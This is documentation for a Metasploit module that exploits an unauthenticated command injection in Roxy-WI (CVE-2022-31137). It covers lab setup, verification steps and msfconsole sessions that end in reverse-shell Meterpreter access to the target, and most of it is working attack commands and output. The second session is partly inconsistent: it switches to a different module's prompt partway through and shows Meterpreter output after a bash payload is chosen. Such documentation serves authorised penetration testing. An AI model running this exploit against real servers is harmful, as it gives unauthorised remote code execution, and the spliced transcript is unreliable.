## Vulnerable Application

### Description

This module exploits command injection vulnerability to achieve remote code execution. Unauthenticated users
can execute a terminal command under the context of the web server user.

In versions 6.1.1.0 and earlier, an unauthenticated user can execute some methods of administrator fun
without needing any credentials. Due to the nature of the vulnerability, an adversary can change some part
of the webpage, or hijack an administrator account, or execute operating system command under the context
of the web-server user.

Technical details about the vulnerability can be found at
[here](https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137/).

### Setup

Roxy-WI requires Python and a web server to run. Please visit following url to find out
required python and other packages.

[https://roxy-wi.org/installation.py](https://roxy-wi.org/installation.py)

```
git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
chmod +x haproxy-wi/app/*.py 
sudo ./haproxy-wi/app/create_db.py
chown -R www-data:www-data haproxy-wi
```

## Options

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/roxy_wi_exec`
4. Set `RHOST`
5. Set `LHOST`
6. Set `USERNAME`
7. Set `PASSWORD`
8. Run `exploit`
9. Do: `run`
10. You should get a shell.
11. **Verify** that you are getting `meterpreter` session.


## Targets

### 0

`Python payload`

### 1
`Command payload`

## Scenarios

```
msf6 >
msf6 > use exploit/linux/http/roxy_wi_exec 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Checking if 192.168.56.116:443 is vulnerable!
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[+] Exploit successfully executed.
[*] Sending stage (40168 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:35490) at 2022-07-19 14:13:41 +0300

meterpreter > ls
Listing: /var/www/haproxy-wi/app
================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
```

You can also use cmd payloads.

```
msf6 >
msf6 > use exploit/linux/http/roxy_wi_exec 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(linux/http/mailcleaner_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/http/mailcleaner_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Checking if 192.168.56.116:443 is vulnerable!
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[+] Exploit successfully executed.
[*] Sending stage (40168 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:35490) at 2022-07-19 14:13:41 +0300

id
uid=1000(xxx) gid=1000(xxx) groups=1000(xxx)
```